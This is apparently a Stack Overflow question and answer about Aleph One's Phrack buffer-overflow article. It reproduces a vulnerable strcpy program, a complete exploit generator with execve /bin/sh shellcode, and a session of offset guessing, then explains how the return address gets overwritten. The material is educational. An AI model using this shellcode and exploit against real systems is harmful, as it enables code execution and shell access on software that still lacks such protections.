c stack-overflow reverse-engineering buffer-overflow shellcode

Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential

I'm looking at aleph's article on phrack magazine. The code below can also be found there.

We have a vulnerable executable which it's code is:

vulnerable.c

void main(int argc, char *argv[]) {
  char buffer[512];

  if (argc > 1)
    strcpy(buffer,argv[1]);
}

Now, since we don't really know, when trying to attack that executable (by overflowing buffer), what is the address of buffer. We need to know it's address because we want to override the ret to point to the beginning of buffer (in which we put our shellcode).

The guessing procedure that is described in the article is as follows:

We can create a program that takes as a parameter a buffer size, and an offset from its own stack pointer (where we believe the buffer we want to overflow may live). We'll put the overflow string in an environment variable so it is easy to manipulate:

exploit2.c

#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512

char shellcode[] = //this shellcode merely opens a shell
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr += 4;
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}

Now we can try to guess what the buffer and offset should be:

[aleph1]$ ./exploit2 500
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$ exit
[aleph1]$ ./exploit2 600
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
Illegal instruction
[aleph1]$ exit
[aleph1]$ ./exploit2 600 100
Using address: 0xbffffd4c
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
[aleph1]$ ./exploit2 600 200
Using address: 0xbffffce8
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit2 600 1564
Using address: 0xbffff794
[aleph1]$ ./vulnerable $EGG
$

I don't understand what does the writer meant to present, in explot2.c we guess the size of the buffer in vulnerable.c and it's offset from the stack pointer.

Why do we apply this offset on the stack pointer of exploit2?
How does this effect vulnerable?
What's the purpose of exploit2.c except from building the EGG environment variable?
Why do we call system("/bin/bash"); at the end?
What's going on between vulnerable and exploit2 in general?

Solution

The only purpose of exploit2 is building the egg variable, which needs to be passed as a parameter to vulnerable. It could be modified so to call vulnerable on its own.

The shellcode variable contains machine code for a function that invokes a shell. The goal is to copy this code into the buffer variable of vulnerable, and then overwrite the return address of the main function of vulnerable to point to the entry point of the shell code, that is, the address of the variable buffer. The stack grows downward: the stack pointer register (esp in 32-bit x86 architecture) contains the smallest address used by local variables of the current function, at higher addresses we find other local variables, then the return address of the currently executing function, then the variables of the callee and so on. An overflow write on a variable, such as buffer in vulnerable, would overwrite whatever follows buffer in memory, in this case the return address of main since buffer is a local variable of the main function.

Now that we know what to do, we need some information:

the address of the buffer variable, let's call it bp
the address of the return address of the main function, let's call it ra

If we had this information we could forge an exploit string EGG such that:

its length is ra - bp + sizeof(void*) in order to overflow the string buffer enough to overwrite the return address (sizeof (void* is the size of the return address)
it contains the exploit code to be executed at the beginning, and the address bp at the end

Note that we only need a rough guess for the length of the string because we can just make the string longer and keep repeating the address bp all over it, but we need to compute the exact bp address if we want the shellcode to be executed properly.

We start by guessing the string length needed to overwrite the return value: 600 is enough, because it triggers an Illegal instruction error. Once we find it, we can look for the bp address.

We know that bp is around the bottom of the stack, because that's where the local variables are stored. We assume that the address for the stack are the same in vulnerable and exploit2, we measure the stack address in exploit2 and start poking around changing offset. Once we get the right offset (the one which result in addr being equal to the target bp) the shell code will be executed when the control flow return from the main function of vulnerable.

If you want to test this code, remember that this does not work in modern machines because of the execution prevention technology which is used by operating system to marks pages containing data as not executable.